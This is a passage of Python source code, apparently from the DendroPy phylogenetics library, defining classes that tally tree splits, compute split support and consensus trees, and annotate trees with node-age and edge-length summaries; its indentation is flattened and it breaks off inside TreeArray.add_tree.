class SplitDistribution(taxonmodel.TaxonNamespaceAssociated):
"""
Collects information regarding splits over multiple trees.
"""
SUMMARY_STATS_FIELDNAMES = ('mean', 'median', 'sd', 'hpd95', 'quant_5_95', 'range')
def __init__(self,
taxon_namespace=None,
ignore_edge_lengths=False,
ignore_node_ages=True,
use_tree_weights=True,
ultrametricity_precision=constants.DEFAULT_ULTRAMETRICITY_PRECISION,
is_force_max_age=False,
taxon_label_age_map=None):
# Taxon Namespace
taxonmodel.TaxonNamespaceAssociated.__init__(self,
taxon_namespace=taxon_namespace)
# configuration
self.ignore_edge_lengths = ignore_edge_lengths
self.ignore_node_ages = ignore_node_ages
self.use_tree_weights = use_tree_weights
self.ultrametricity_precision = ultrametricity_precision
# storage/function
self.total_trees_counted = 0
self.sum_of_tree_weights = 0.0
self.tree_rooting_types_counted = set()
self.split_counts = collections.defaultdict(float)
self.split_edge_lengths = collections.defaultdict(list)
self.split_node_ages = collections.defaultdict(list)
self.is_force_max_age = is_force_max_age
self.is_force_min_age = False
self.taxon_label_age_map = taxon_label_age_map
# secondary/derived/generated/collected data
self._is_rooted = False
self._split_freqs = None
self._trees_counted_for_freqs = 0
self._split_edge_length_summaries = None
self._split_node_age_summaries = None
self._trees_counted_for_summaries = 0
# services
self.tree_decorator = None
###########################################################################
### Utility
def normalize_bitmask(self, bitmask):
"""
"Normalizes" split, by ensuring that the least-significant bit is
always 1 (used on unrooted trees to establish split identity
independent of rotation).
Parameters
----------
bitmask : integer
Split bitmask hash to be normalized.
Returns
-------
h : integer
Normalized split bitmask.
"""
return treemodel.Bipartition.normalize_bitmask(
bitmask=bitmask,
fill_bitmask=self.taxon_namespace.all_taxa_bitmask(),
lowest_relevant_bit=1)
###########################################################################
### Configuration
def _is_rooted_deprecation_warning(self):
deprecate.dendropy_deprecation_warning(
message="Deprecated since DendroPy 4: 'SplitDistribution.is_rooted' and 'SplitDistribution.is_unrooted' are no longer valid attributes; rooting state tracking and management is now the responsibility of client code.",
stacklevel=4,
)
def _get_is_rooted(self):
self._is_rooted_deprecation_warning()
return self._is_rooted
def _set_is_rooted(self, val):
self._is_rooted_deprecation_warning()
self._is_rooted = val
is_rooted = property(_get_is_rooted, _set_is_rooted)
def _get_is_unrooted(self):
self._is_rooted_deprecation_warning()
return not self._is_rooted
def _set_is_unrooted(self, val):
self._is_rooted_deprecation_warning()
self._is_rooted = not val
is_unrooted = property(_get_is_unrooted, _set_is_unrooted)
###########################################################################
### Split Counting and Book-Keeping
def add_split_count(self, split, count=1):
self.split_counts[split] += count
def count_splits_on_tree(self,
tree,
is_bipartitions_updated=False,
default_edge_length_value=None):
"""
Counts splits in this tree and add to totals. ``tree`` must be decorated
with splits, and no attempt is made to normalize taxa.
Parameters
----------
tree : a |Tree| object.
The tree on which to count the splits.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
Returns
--------
s : iterable of splits
A list of split bitmasks from ``tree``.
e :
A list of edge length values from ``tree``.
a :
A list of node age values from ``tree``.
"""
assert tree.taxon_namespace is self.taxon_namespace
self.total_trees_counted += 1
if not self.ignore_node_ages:
if self.taxon_label_age_map:
set_node_age_fn = self._set_node_age
else:
set_node_age_fn = None
tree.calc_node_ages(
ultrametricity_precision=self.ultrametricity_precision,
is_force_max_age=self.is_force_max_age,
is_force_min_age=self.is_force_min_age,
set_node_age_fn=set_node_age_fn,
)
if tree.weight is not None and self.use_tree_weights:
weight_to_use = float(tree.weight)
else:
weight_to_use = 1.0
self.sum_of_tree_weights += weight_to_use
if tree.is_rooted:
self.tree_rooting_types_counted.add(True)
else:
self.tree_rooting_types_counted.add(False)
if not is_bipartitions_updated:
tree.encode_bipartitions()
splits = []
edge_lengths = []
node_ages = []
for bipartition in tree.bipartition_encoding:
split = bipartition.split_bitmask
## if edge is stored as an attribute, might be faster to:
# edge = bipartition.edge
edge = tree.bipartition_edge_map[bipartition]
splits.append(split)
self.split_counts[split] += weight_to_use
if not self.ignore_edge_lengths:
sel = self.split_edge_lengths.setdefault(split,[])
if edge.length is None:
elen = default_edge_length_value
else:
elen = edge.length
sel.append(elen)
edge_lengths.append(elen)
else:
sel = None
if not self.ignore_node_ages:
sna = self.split_node_ages.setdefault(split, [])
if edge.head_node is not None:
nage = edge.head_node.age
else:
nage = None
sna.append(nage)
node_ages.append(nage)
else:
sna = None
return splits, edge_lengths, node_ages
def splits_considered(self):
"""
Returns 4 values:
total number of splits counted
total *weighted* number of unique splits counted
total number of non-trivial splits counted
total *weighted* number of unique non-trivial splits counted
"""
if not self.split_counts:
return 0, 0, 0, 0
num_splits = 0
num_unique_splits = 0
num_nt_splits = 0
num_nt_unique_splits = 0
taxa_mask = self.taxon_namespace.all_taxa_bitmask()
for s in self.split_counts:
num_unique_splits += 1
num_splits += self.split_counts[s]
if not treemodel.Bipartition.is_trivial_bitmask(s, taxa_mask):
num_nt_unique_splits += 1
num_nt_splits += self.split_counts[s]
return num_splits, num_unique_splits, num_nt_splits, num_nt_unique_splits
def calc_freqs(self):
"Forces recalculation of frequencies."
self._split_freqs = {}
if self.total_trees_counted == 0:
for split in self.split_counts:
self._split_freqs[split] = 1.0
else:
normalization_weight = self.calc_normalization_weight()
for split in self.split_counts:
count = self.split_counts[split]
self._split_freqs[split] = float(self.split_counts[split]) / normalization_weight
self._trees_counted_for_freqs = self.total_trees_counted
self._split_edge_length_summaries = None
self._split_node_age_summaries = None
return self._split_freqs
def calc_normalization_weight(self):
if not self.sum_of_tree_weights:
return self.total_trees_counted
else:
return float(self.sum_of_tree_weights)
def update(self, split_dist):
self.total_trees_counted += split_dist.total_trees_counted
self.sum_of_tree_weights += split_dist.sum_of_tree_weights
self._split_edge_length_summaries = None
self._split_node_age_summaries = None
self._trees_counted_for_summaries = 0
self.tree_rooting_types_counted.update(split_dist.tree_rooting_types_counted)
for split in split_dist.split_counts:
self.split_counts[split] += split_dist.split_counts[split]
self.split_edge_lengths[split] += split_dist.split_edge_lengths[split]
self.split_node_ages[split] += split_dist.split_node_ages[split]
###########################################################################
### Basic Information Access
def __len__(self):
return len(self.split_counts)
def __iter__(self):
for s in self.split_counts:
yield s
def __getitem__(self, split_bitmask):
"""
Returns freqency of split_bitmask.
"""
return self._get_split_frequencies().get(split_bitmask, 0.0)
def _get_split_frequencies(self):
if self._split_freqs is None or self._trees_counted_for_freqs != self.total_trees_counted:
self.calc_freqs()
return self._split_freqs
split_frequencies = property(_get_split_frequencies)
def is_mixed_rootings_counted(self):
return ( (True in self.tree_rooting_types_counted)
and (False in self.tree_rooting_types_counted or None in self.tree_rooting_types_counted) )
def is_all_counted_trees_rooted(self):
return (True in self.tree_rooting_types_counted) and (len(self.tree_rooting_types_counted) == 1)
def is_all_counted_trees_strictly_unrooted(self):
return (False in self.tree_rooting_types_counted) and (len(self.tree_rooting_types_counted) == 1)
def is_all_counted_trees_treated_as_unrooted(self):
return True not in self.tree_rooting_types_counted
###########################################################################
### Summarization
def split_support_iter(self,
tree,
is_bipartitions_updated=False,
include_external_splits=False,
traversal_strategy="preorder",
node_support_attr_name=None,
edge_support_attr_name=None,
):
"""
Returns iterator over support values for the splits of a given tree,
where the support value is given by the proportional frequency of the
split in the current split distribution.
Parameters
----------
tree : |Tree|
The |Tree| which will be scored.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
include_external_splits : bool
If |True|, then non-internal split posteriors will be included.
If |False|, then these are skipped. This should only make a
difference when dealing with splits collected from trees of
different leaf sets.
traversal_strategy : str
One of: "preorder" or "postorder". Specfies order in which splits
are visited.
Returns
-------
s : list of floats
List of values for splits in the tree corresponding to the
proportional frequency that the split is found in the current
distribution.
"""
if traversal_strategy == "preorder":
if include_external_splits:
iter_fn = tree.preorder_node_iter
else:
iter_fn = tree.preorder_internal_node_iter
elif traversal_strategy == "postorder":
if include_external_splits:
iter_fn = tree.postorder_node_iter
else:
iter_fn = tree.postorder_internal_node_iter
else:
raise ValueError("Traversal strategy not supported: '{}'".format(traversal_strategy))
if not is_bipartitions_updated:
tree.encode_bipartitions()
split_frequencies = self._get_split_frequencies()
for nd in iter_fn():
split = nd.edge.split_bitmask
support = split_frequencies.get(split, 0.0)
yield support
def calc_split_edge_length_summaries(self):
self._split_edge_length_summaries = {}
for split, elens in self.split_edge_lengths.items():
if not elens:
continue
try:
self._split_edge_length_summaries[split] = statistics.summarize(elens)
except ValueError:
pass
return self._split_edge_length_summaries
def calc_split_node_age_summaries(self):
self._split_node_age_summaries = {}
for split, ages in self.split_node_ages.items():
if not ages:
continue
try:
self._split_node_age_summaries[split] = statistics.summarize(ages)
except ValueError:
pass
return self._split_node_age_summaries
def _set_node_age(self, nd):
if nd.taxon is None or nd._child_nodes:
return None
else:
return self.taxon_label_age_map.get(nd.taxon.label, 0.0)
def _get_split_edge_length_summaries(self):
if self._split_edge_length_summaries is None \
or self._trees_counted_for_summaries != self.total_trees_counted:
self.calc_split_edge_length_summaries()
return self._split_edge_length_summaries
split_edge_length_summaries = property(_get_split_edge_length_summaries)
def _get_split_node_age_summaries(self):
if self._split_node_age_summaries is None \
or self._trees_counted_for_summaries != self.total_trees_counted:
self.calc_split_node_age_summaries()
return self._split_node_age_summaries
split_node_age_summaries = property(_get_split_node_age_summaries)
def log_product_of_split_support_on_tree(self,
tree,
is_bipartitions_updated=False,
include_external_splits=False,
):
"""
Calculates the (log) product of the support of the splits of the
tree, where the support is given by the proportional frequency of the
split in the current split distribution.
The tree that has the highest product of split support out of a sample
of trees corresponds to the "maximum credibility tree" for that sample.
This can also be referred to as the "maximum clade credibility tree",
though this latter term is sometimes use for the tree that has the
highest *sum* of split support (see
:meth:`SplitDistribution.sum_of_split_support_on_tree()`).
Parameters
----------
tree : |Tree|
The tree for which the score should be calculated.
is_bipartitions_updated : bool
If |True|, then the splits are assumed to have already been encoded
and will not be updated on the trees.
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : numeric
The log product of the support of the splits of the tree.
"""
log_product_of_split_support = 0.0
for split_support in self.split_support_iter(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
include_external_splits=include_external_splits,
traversal_strategy="preorder",
):
if split_support:
log_product_of_split_support += math.log(split_support)
return log_product_of_split_support
def sum_of_split_support_on_tree(self,
tree,
is_bipartitions_updated=False,
include_external_splits=False,
):
"""
Calculates the sum of the support of the splits of the tree, where the
support is given by the proportional frequency of the split in the
current distribtion.
Parameters
----------
tree : |Tree|
The tree for which the score should be calculated.
is_bipartitions_updated : bool
If |True|, then the splits are assumed to have already been encoded
and will not be updated on the trees.
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : numeric
The sum of the support of the splits of the tree.
"""
sum_of_split_support = 0.0
for split_support in self.split_support_iter(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
include_external_splits=include_external_splits,
traversal_strategy="preorder",
):
sum_of_split_support += split_support
return sum_of_split_support
def collapse_edges_with_less_than_minimum_support(self,
tree,
min_freq=constants.GREATER_THAN_HALF,
):
"""
Collapse edges on tree that have support less than indicated by
``min_freq``.
"""
if not tree.is_rooted and self.is_all_counted_trees_rooted():
raise ValueError("Tree is interpreted as unrooted, but split support is based on rooted trees")
elif tree.is_rooted and self.is_all_counted_trees_treated_as_unrooted():
raise ValueError("Tree is interpreted as rooted, but split support is based on unrooted trees")
tree.encode_bipartitions()
split_frequencies = self._get_split_frequencies()
to_collapse = []
for nd in tree.postorder_node_iter():
s = nd.edge.bipartition.split_bitmask
if s not in split_frequencies:
to_collapse.append(nd)
elif split_frequencies[s] < min_freq:
to_collapse.append(nd)
for nd in to_collapse:
nd.edge.collapse(adjust_collapsed_head_children_edge_lengths=True)
def consensus_tree(self,
min_freq=constants.GREATER_THAN_HALF,
is_rooted=None,
summarize_splits=True,
**split_summarization_kwargs
):
"""
Returns a consensus tree from splits in ``self``.
Parameters
----------
min_freq : real
The minimum frequency of a split in this distribution for it to be
added to the tree.
is_rooted : bool
Should tree be rooted or not? If *all* trees counted for splits are
explicitly rooted or unrooted, then this will default to |True| or
|False|, respectively. Otherwise it defaults to |None|.
\*\*split_summarization_kwargs : keyword arguments
These will be passed directly to the underlying
`SplitDistributionSummarizer` object. See
:meth:`SplitDistributionSummarizer.configure` for options.
Returns
-------
t : consensus tree
"""
if is_rooted is None:
if self.is_all_counted_trees_rooted():
is_rooted = True
elif self.is_all_counted_trees_strictly_unrooted():
is_rooted = False
split_frequencies = self._get_split_frequencies()
to_try_to_add = []
_almost_one = lambda x: abs(x - 1.0) <= 0.0000001
for s in split_frequencies:
freq = split_frequencies[s]
if (min_freq is None) or (freq >= min_freq) or (_almost_one(min_freq) and _almost_one(freq)):
to_try_to_add.append((freq, s))
to_try_to_add.sort(reverse=True)
splits_for_tree = [i[1] for i in to_try_to_add]
con_tree = treemodel.Tree.from_split_bitmasks(
split_bitmasks=splits_for_tree,
taxon_namespace=self.taxon_namespace,
is_rooted=is_rooted)
if summarize_splits:
self.summarize_splits_on_tree(
tree=con_tree,
is_bipartitions_updated=False,
**split_summarization_kwargs
)
return con_tree
def summarize_splits_on_tree(self,
tree,
is_bipartitions_updated=False,
**split_summarization_kwargs
):
"""
Summarizes support of splits/edges/node on tree.
Parameters
----------
tree: |Tree| instance
Tree to be decorated with support values.
is_bipartitions_updated: bool
If |True|, then bipartitions will not be recalculated.
\*\*split_summarization_kwargs : keyword arguments
These will be passed directly to the underlying
`SplitDistributionSummarizer` object. See
:meth:`SplitDistributionSummarizer.configure` for options.
"""
if self.taxon_namespace is not tree.taxon_namespace:
raise error.TaxonNamespaceIdentityError(self, tree)
if self.tree_decorator is None:
self.tree_decorator = SplitDistributionSummarizer()
self.tree_decorator.configure(**split_summarization_kwargs)
self.tree_decorator.summarize_splits_on_tree(
split_distribution=self,
tree=tree,
is_bipartitions_updated=is_bipartitions_updated)
return tree
###########################################################################
### legacy
def _get_taxon_set(self):
from dendropy import taxonmodel
taxon_model.taxon_set_deprecation_warning()
return self.taxon_namespace
def _set_taxon_set(self, v):
from dendropy import taxonmodel
taxon_model.taxon_set_deprecation_warning()
self.taxon_namespace = v
def _del_taxon_set(self):
from dendropy import taxonmodel
taxon_model.taxon_set_deprecation_warning()
taxon_set = property(_get_taxon_set, _set_taxon_set, _del_taxon_set)
###############################################################################
### SplitDistributionSummarizer
class SplitDistributionSummarizer(object):
def __init__(self, **kwargs):
"""
See :meth:`SplitDistributionSummarizer.configure` for configuration
options.
"""
self.configure(**kwargs)
def configure(self, **kwargs):
"""
Configure rendition/mark-up.
Parameters
----------
set_edge_lengths : string
For each edge, set the length based on:
- "support": use support values split corresponding to edge
- "mean-length": mean of edge lengths for split
- "median-length": median of edge lengths for split
- "mean-age": such that split age is equal to mean of ages
- "median-age": such that split age is equal to mean of ages
- |None|: do not set edge lengths
add_support_as_node_attribute: bool
Adds each node's support value as an attribute of the node,
"``support``".
add_support_as_node_annotation: bool
Adds support as a metadata annotation, "``support``". If
``add_support_as_node_attribute`` is |True|, then the value will be
dynamically-bound to the value of the node's "``support``" attribute.
set_support_as_node_label : bool
Sets the ``label`` attribute of each node to the support value.
add_node_age_summaries_as_node_attributes: bool
Summarizes the distribution of the ages of each node in the
following attributes:
- ``age_mean``
- ``age_median``
- ``age_sd``
- ``age_hpd95``
- ``age_range``
add_node_age_summaries_as_node_annotations: bool
Summarizes the distribution of the ages of each node in the
following metadata annotations:
- ``age_mean``
- ``age_median``
- ``age_sd``
- ``age_hpd95``
- ``age_range``
If ``add_node_age_summaries_as_node_attributes`` is |True|, then the
values will be dynamically-bound to the corresponding node
attributes.
add_edge_length_summaries_as_edge_attributes: bool
Summarizes the distribution of the lengths of each edge in the
following attribtutes:
- ``length_mean``
- ``length_median``
- ``length_sd``
- ``length_hpd95``
- ``length_range``
add_edge_length_summaries_as_edge_annotations: bool
Summarizes the distribution of the lengths of each edge in the
following metadata annotations:
- ``length_mean``
- ``length_median``
- ``length_sd``
- ``length_hpd95``
- ``length_range``
If ``add_edge_length_summaries_as_edge_attributes`` is |True|, then the
values will be dynamically-bound to the corresponding edge
attributes.
support_label_decimals: int
Number of decimal places to express when rendering the support
value as a string for the node label.
support_as_percentages: bool
Whether or not to express the support value as percentages (default
is probability or proportion).
minimum_edge_length : numeric
All edge lengths calculated to have a value less than this will be
set to this.
error_on_negative_edge_lengths : bool
If |True|, an inferred edge length that is less than 0 will result
in a ValueError.
"""
self.set_edge_lengths = kwargs.pop("set_edge_lengths", None)
self.add_support_as_node_attribute = kwargs.pop("add_support_as_node_attribute", True)
self.add_support_as_node_annotation = kwargs.pop("add_support_as_node_annotation", True)
self.set_support_as_node_label = kwargs.pop("set_support_as_node_label", None)
self.add_node_age_summaries_as_node_attributes = kwargs.pop("add_node_age_summaries_as_node_attributes", True)
self.add_node_age_summaries_as_node_annotations = kwargs.pop("add_node_age_summaries_as_node_annotations", True)
self.add_edge_length_summaries_as_edge_attributes = kwargs.pop("add_edge_length_summaries_as_edge_attributes", True)
self.add_edge_length_summaries_as_edge_annotations = kwargs.pop("add_edge_length_summaries_as_edge_annotations", True)
self.support_label_decimals = kwargs.pop("support_label_decimals", 4)
self.support_as_percentages = kwargs.pop("support_as_percentages", False)
self.support_label_compose_fn = kwargs.pop("support_label_compose_fn", None)
self.primary_fieldnames = ["support",]
self.summary_stats_fieldnames = SplitDistribution.SUMMARY_STATS_FIELDNAMES
self.no_data_values = {
'hpd95': [],
'quant_5_95': [],
'range': [],
}
self.node_age_summaries_fieldnames = list("age_{}".format(f) for f in self.summary_stats_fieldnames)
self.edge_length_summaries_fieldnames = list("length_{}".format(f) for f in self.summary_stats_fieldnames)
self.fieldnames = self.primary_fieldnames + self.node_age_summaries_fieldnames + self.edge_length_summaries_fieldnames
for fieldname in self.fieldnames:
setattr(self, "{}_attr_name".format(fieldname), kwargs.pop("{}_attr_name".format(fieldname), fieldname))
setattr(self, "{}_annotation_name".format(fieldname), kwargs.pop("{}_annotation_name".format(fieldname), fieldname))
setattr(self, "is_{}_annotation_dynamic".format(fieldname), kwargs.pop("is_{}_annotation_dynamic".format(fieldname), True))
self.minimum_edge_length = kwargs.pop("minimum_edge_length", None)
self.error_on_negative_edge_lengths = kwargs.pop("error_on_negative_edge_lengths", False)
if kwargs:
TypeError("Unrecognized or unsupported arguments: {}".format(kwargs))
def _decorate(self,
target,
fieldname,
value,
set_attribute,
set_annotation,
):
attr_name = getattr(self, "{}_attr_name".format(fieldname))
annotation_name = getattr(self, "{}_annotation_name".format(fieldname))
if set_attribute:
setattr(target, attr_name, value)
if set_annotation:
target.annotations.drop(name=annotation_name)
if getattr(self, "is_{}_annotation_dynamic".format(fieldname)):
target.annotations.add_bound_attribute(
attr_name=attr_name,
annotation_name=annotation_name,
)
else:
target.annotations.add_new(
name=annotation_name,
value=value,
)
elif set_annotation:
target.annotations.drop(name=annotation_name)
target.annotations.add_new(
name=annotation_name,
value=value,
)
def summarize_splits_on_tree(self,
split_distribution,
tree,
is_bipartitions_updated=False):
if split_distribution.taxon_namespace is not tree.taxon_namespace:
raise error.TaxonNamespaceIdentityError(split_distribution, tree)
if not is_bipartitions_updated:
tree.encode_bipartitions()
if self.support_label_compose_fn is not None:
support_label_fn = lambda freq: self.support_label_compose_fn(freq)
else:
support_label_fn = lambda freq: "{:.{places}f}".format(freq, places=self.support_label_decimals)
node_age_summaries = split_distribution.split_node_age_summaries
edge_length_summaries = split_distribution.split_edge_length_summaries
split_freqs = split_distribution.split_frequencies
assert len(self.node_age_summaries_fieldnames) == len(self.summary_stats_fieldnames)
for node in tree:
split_bitmask = node.edge.bipartition.split_bitmask
split_support = split_freqs.get(split_bitmask, 0.0)
if self.support_as_percentages:
split_support = split_support * 100
self._decorate(
target=node,
fieldname="support",
value=split_support,
set_attribute=self.add_support_as_node_attribute,
set_annotation=self.add_support_as_node_annotation,
)
if self.set_support_as_node_label:
node.label = support_label_fn(split_support)
if (self.add_node_age_summaries_as_node_attributes or self.add_node_age_summaries_as_node_annotations) and node_age_summaries:
for fieldname, stats_fieldname in zip(self.node_age_summaries_fieldnames, self.summary_stats_fieldnames):
no_data_value = self.no_data_values.get(stats_fieldname, 0.0)
if not node_age_summaries or split_bitmask not in node_age_summaries:
value = no_data_value
else:
value = node_age_summaries[split_bitmask].get(stats_fieldname, no_data_value)
self._decorate(
target=node,
fieldname=fieldname,
value=value,
set_attribute=self.add_node_age_summaries_as_node_attributes,
set_annotation=self.add_node_age_summaries_as_node_annotations,
)
if (self.add_edge_length_summaries_as_edge_attributes or self.add_edge_length_summaries_as_edge_annotations) and edge_length_summaries:
for fieldname, stats_fieldname in zip(self.edge_length_summaries_fieldnames, self.summary_stats_fieldnames):
no_data_value = self.no_data_values.get(stats_fieldname, 0.0)
if not edge_length_summaries or split_bitmask not in edge_length_summaries:
value = no_data_value
else:
value = edge_length_summaries[split_bitmask].get(stats_fieldname, no_data_value)
self._decorate(
target=node.edge,
fieldname=fieldname,
value=value,
set_attribute=self.add_edge_length_summaries_as_edge_attributes,
set_annotation=self.add_edge_length_summaries_as_edge_annotations,
)
if self.set_edge_lengths is None:
pass
elif self.set_edge_lengths == "keep":
pass
elif self.set_edge_lengths == "support":
node.edge.length = split_support
elif self.set_edge_lengths == "clear":
edge.length = None
elif self.set_edge_lengths in ("mean-age", "median-age"):
if not node_age_summaries:
raise ValueError("Node ages not available")
if self.set_edge_lengths == "mean-age":
try:
node.age = node_age_summaries[split_bitmask]["mean"]
except KeyError:
node.age = self.no_data_values.get("mean", 0.0)
elif self.set_edge_lengths == "median-age":
try:
node.age = node_age_summaries[split_bitmask]["median"]
except KeyError:
node.age = self.no_data_values.get("median", 0.0)
else:
raise ValueError(self.set_edge_lengths)
elif self.set_edge_lengths in ("mean-length", "median-length"):
if not edge_length_summaries:
raise ValueError("Edge lengths not available")
if self.set_edge_lengths == "mean-length":
try:
node.edge.length = edge_length_summaries[split_bitmask]["mean"]
except KeyError:
node.edge.length = self.no_data_values.get("mean", 0.0)
elif self.set_edge_lengths == "median-length":
try:
node.edge.length = edge_length_summaries[split_bitmask]["median"]
except KeyError:
node.edge.length = self.no_data_values.get("median", 0.0)
else:
raise ValueError(self.set_edge_lengths)
if self.minimum_edge_length is not None and edge.length < self.minimum_edge_length:
edge.length = self.minimum_edge_length
else:
raise ValueError(self.set_edge_lengths)
if self.set_edge_lengths in ("mean-age", "median-age"):
tree.set_edge_lengths_from_node_ages(
minimum_edge_length=self.minimum_edge_length,
error_on_negative_edge_lengths=self.error_on_negative_edge_lengths)
elif self.set_edge_lengths not in ("keep", "clear", None) and self.minimum_edge_length is not None:
for node in tree:
if node.edge.length is None:
node.edge.length = self.minimum_edge_length
elif node.edge.length < self.minimum_edge_length:
node.edge.length = self.minimum_edge_length
return tree
###############################################################################
### TreeArray
class TreeArray(
taxonmodel.TaxonNamespaceAssociated,
basemodel.MultiReadable,
):
"""
High-performance collection of tree structures.
Storage of minimal tree structural information as represented by toplogy
and edge lengths, minimizing memory and processing time.
This class stores trees as collections of splits and edge lengths. All
other information, such as labels, metadata annotations, etc. will be
discarded. A full |Tree| instance can be reconstructed as needed
from the structural information stored by this class, at the cost of
computation time.
"""
class IncompatibleTreeArrayUpdate(Exception):
pass
class IncompatibleRootingTreeArrayUpdate(IncompatibleTreeArrayUpdate):
pass
class IncompatibleEdgeLengthsTreeArrayUpdate(IncompatibleTreeArrayUpdate):
pass
class IncompatibleNodeAgesTreeArrayUpdate(IncompatibleTreeArrayUpdate):
pass
class IncompatibleTreeWeightsTreeArrayUpdate(IncompatibleTreeArrayUpdate):
pass
##############################################################################
## Factory Function
@classmethod
def from_tree_list(cls,
trees,
is_rooted_trees=None,
ignore_edge_lengths=False,
ignore_node_ages=True,
use_tree_weights=True,
ultrametricity_precision=constants.DEFAULT_ULTRAMETRICITY_PRECISION,
is_force_max_age=None,
taxon_label_age_map=None,
is_bipartitions_updated=False,
):
taxon_namespace = trees.taxon_namespace
ta = cls(
taxon_namespace=taxon_namespace,
is_rooted_trees=is_rooted_trees,
ignore_edge_lengths=ignore_edge_lengths,
ignore_node_ages=ignore_node_ages,
use_tree_weights=use_tree_weights,
ultrametricity_precision=ultrametricity_precision,
is_force_max_age=is_force_max_age,
taxon_label_age_map=taxon_label_age_map,
)
ta.add_trees(
trees=trees,
is_bipartitions_updated=is_bipartitions_updated)
return ta
##############################################################################
## Life-Cycle
def __init__(self,
taxon_namespace=None,
is_rooted_trees=None,
ignore_edge_lengths=False,
ignore_node_ages=True,
use_tree_weights=True,
ultrametricity_precision=constants.DEFAULT_ULTRAMETRICITY_PRECISION,
is_force_max_age=None,
taxon_label_age_map=None,
):
"""
Parameters
----------
taxon_namespace : |TaxonNamespace|
The operational taxonomic unit concept namespace to manage taxon
references.
is_rooted_trees : bool
If not set, then it will be set based on the rooting state of the
first tree added. If |True|, then trying to add an unrooted tree
will result in an error. If |False|, then trying to add a rooted
tree will result in an error.
ignore_edge_lengths : bool
If |True|, then edge lengths of splits will not be stored. If
|False|, then edge lengths will be stored.
ignore_node_ages : bool
If |True|, then node ages of splits will not be stored. If
|False|, then node ages will be stored.
use_tree_weights : bool
If |False|, then tree weights will not be used to weight splits.
"""
taxonmodel.TaxonNamespaceAssociated.__init__(self,
taxon_namespace=taxon_namespace)
# Configuration
self._is_rooted_trees = is_rooted_trees
self.ignore_edge_lengths = ignore_edge_lengths
self.ignore_node_ages = ignore_node_ages
self.use_tree_weights = use_tree_weights
self.default_edge_length_value = 0 # edge.length of |None| gets this value
self.tree_type = treemodel.Tree
self.taxon_label_age_map = taxon_label_age_map
# Storage
self._tree_split_bitmasks = []
self._tree_edge_lengths = []
self._tree_leafset_bitmasks = []
self._tree_weights = []
self._split_distribution = SplitDistribution(
taxon_namespace=self.taxon_namespace,
ignore_edge_lengths=self.ignore_edge_lengths,
ignore_node_ages=self.ignore_node_ages,
ultrametricity_precision=ultrametricity_precision,
is_force_max_age=is_force_max_age,
taxon_label_age_map=self.taxon_label_age_map,
)
##############################################################################
## Book-Keeping
def _get_is_rooted_trees(self):
return self._is_rooted_trees
is_rooted_trees = property(_get_is_rooted_trees)
def _get_split_distribution(self):
return self._split_distribution
split_distribution = property(_get_split_distribution)
def validate_rooting(self, rooting_of_other):
if self._is_rooted_trees is None:
self._is_rooted_trees = rooting_of_other
elif self._is_rooted_trees != rooting_of_other:
if self._is_rooted_trees:
ta = "rooted"
t = "unrooted"
else:
ta = "unrooted"
t = "rooted"
raise error.MixedRootingError("Cannot add {tree_rooting} tree to TreeArray with {tree_array_rooting} trees".format(
tree_rooting=t,
tree_array_rooting=ta))
##############################################################################
## Updating from Another TreeArray
def update(self, other):
if len(self) > 0:
# self.validate_rooting(other._is_rooted_trees)
if self._is_rooted_trees is not other._is_rooted_trees:
raise TreeArray.IncompatibleRootingTreeArrayUpdate("Updating from incompatible TreeArray: 'is_rooted_trees' should be '{}', but is instead '{}'".format(other._is_rooted_trees, self._is_rooted_trees, ))
if self.ignore_edge_lengths is not other.ignore_edge_lengths:
raise TreeArray.IncompatibleEdgeLengthsTreeArrayUpdate("Updating from incompatible TreeArray: 'ignore_edge_lengths' is not: {} ".format(other.ignore_edge_lengths, self.ignore_edge_lengths, ))
if self.ignore_node_ages is not other.ignore_node_ages:
raise TreeArray.IncompatibleNodeAgesTreeArrayUpdate("Updating from incompatible TreeArray: 'ignore_node_ages' should be '{}', but is instead '{}'".format(other.ignore_node_ages, self.ignore_node_ages))
if self.use_tree_weights is not other.use_tree_weights:
raise TreeArray.IncompatibleTreeWeightsTreeArrayUpdate("Updating from incompatible TreeArray: 'use_tree_weights' should be '{}', but is instead '{}'".format(other.use_tree_weights, self.use_tree_weights))
else:
self._is_rooted_trees = other._is_rooted_trees
self.ignore_edge_lengths = other.ignore_edge_lengths
self.ignore_node_ages = other.ignore_node_ages
self.use_tree_weights = other.use_tree_weights
self._tree_split_bitmasks.extend(other._tree_split_bitmasks)
self._tree_edge_lengths.extend(other._tree_edge_lengths)
self._tree_leafset_bitmasks.extend(other._tree_leafset_bitmasks)
self._tree_weights.extend(other._tree_weights)
self._split_distribution.update(other._split_distribution)
##############################################################################
## Fundamental Tree Accession
def add_tree(self,
tree,
is_bipartitions_updated=False,
index=None):
"""
Adds the structure represented by a |Tree| instance to the
collection.
Parameters
----------
tree : |Tree|
A |Tree| instance. This must have the same rooting state as
all the other trees accessioned into this collection as well as
that of ``self.is_rooted_trees``.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
index : integer
Insert before index.
Returns
-------
index : int
The index of the accession.
s : iterable of splits
A list of split bitmasks from ``tree``.
e :
A list of edge length values from ``tree``.
"""
if self.taxon_namespace is not tree.taxon_namespace:
raise error.TaxonNamespaceIdentityError(self, tree)
self.validate_rooting(tree.is_rooted)
splits, edge_lengths, node_ages = self._split_distribution.count_splits_on_tree(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
default_edge_length_value=self.default_edge_length_value)
# pre-process splits
splits = tuple(splits)
# pre-process edge lengths
if self.ignore_edge_lengths:
# edge_lengths = tuple( [None] * len(splits) )
edge_lengths = tuple( None for x in range(len(splits)) )
else:
assert len(splits) == len(edge_lengths), "Unequal vectors:\n Splits: {}\n Edges: {}\n".format(splits, edge_lengths)
edge_lengths = tuple(edge_lengths)
# pre-process weights
